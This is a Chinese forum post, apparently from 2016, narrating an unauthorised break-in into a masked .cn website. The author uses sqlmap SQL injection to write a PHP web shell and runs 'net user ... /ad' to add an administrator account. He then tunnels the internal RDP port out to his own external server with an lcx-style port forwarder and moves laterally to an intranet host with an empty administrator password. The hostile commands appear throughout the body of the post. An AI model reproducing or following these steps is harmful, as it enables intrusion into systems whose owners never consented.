目标站www.xxxx.cn 打上性感的马赛克.... xx = 马赛克
直接放sqlmap跑
信息就出来啦....... 然后执行 (查看当前数据库连接用户的意思)
如上图所示. 数据库是root帐号登录的 我们还要看下 root帐号被降权没有 (查看是否是管理员权限) 这里是管理员权限 那么 我们直接用sqlmap写一个交互式shell 执行 这里选择4 php 然后骚等...几分钟 或者几十秒... 这里第一眼可以看到 ƒ 这里 写shell成功了 另外 我们的视线转移到 和‚这里来 这两个文件地址 是 sqlmap上传的shell 我们来打开 可以看到 一个小马 躺在这里 接下来该怎么做 不用我说了吧 (直接上传你的大马 或者小马)
那么我们现在来看看‚这里
 丫的...一片空白... 难道是一句话? 我们来看看这个文件的代码...
 可以看到 cmd这个变量.. Cmd这是个变量 就是接收参数的..... ,也就是说 我们可以控制 cmd这个变量来执行cmd命令
 这个system权限够大了吧..哈哈.. 接下来呢 net user xxxxx xxx /ad&net localgroup administrators xxxx /ad 提权进服务器 嘿嘿.. 但是呢
 是内网 我们用个端口转发就好了... 首先你得有一台外网的服务器对吧... 首先在外网的服务器监听 (我这里是 mylcx 可能和 lcx 执行的命令有所不同 但是 功能大同小异...) 憋说话...看下图.. 用mylcx 执行以下命令 Mylcx -listen 1234 4567 监听1234 端口 转发到 4567端口 (这里是在自己外网服务器执行哦 别搞错啦..)
然后 到刚刚那个网站那里 上传一个mylcx到c:\wmpub这个目录下面 这样就 ok啦...? Nononono 先来看看 这台服务器开3389没有 或者 3389端口被修改没有 有经验的人 执行 netstat /ano 根据经验判断 远程桌面 端口 一般是最后一个 TCP 0.0.0.0: 后面对应的端口号 这里是默认的 3389啦.. 既然开放了 3389 那么我们直接映射3389 到我外网的那台服务器的 1234端口就好啦.. 执行以下命令 c:\wmpub\mylcx.txt -slave 3389 xx.xx.165.254 1234 然后按回车 同时 可以看到 我外网的服务器1234端口接收到了数据 并把1234 的数据传送到了 4567 Cmd里面翻译过来大概意思就是 如下图.. 然后我们连接我外网服务器的 4567 端口 就等于连接到了 那个网站的 3389端口 (看不懂的 多理解一下 没有人天生下来 就什么都懂...) 那么直接连接啦.. 当连接成功时 你外网服务器的cmd里面就会有数据在跳动啦... 网站是 apache搭建的... 既然是内网 那么我们可以尝试 getpass 或者 get hash 来尝试一下撸内网..
但是 getpass 未果 提示出错00xxx什么错误 那么这条思路不行了 不过我们可以用工具简单的扫一下内网的一些漏洞.. 我们先看看 可以看到 同网段的服务器就这几台... 下载一个 hasscan 扫一下 内网 (这里就没图啦..) 发现有 10.106.62.58 这台服务器 administrator 空口令... 嘿嘿 啪啪啪登录
这台服务器还是不错的.... 由于时间原因或者技术原因 我就没继续深入渗透下去了...
| 
窥视卡
雷达卡
发表于 2016-3-22 22:21:22
收藏
转播
分享
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜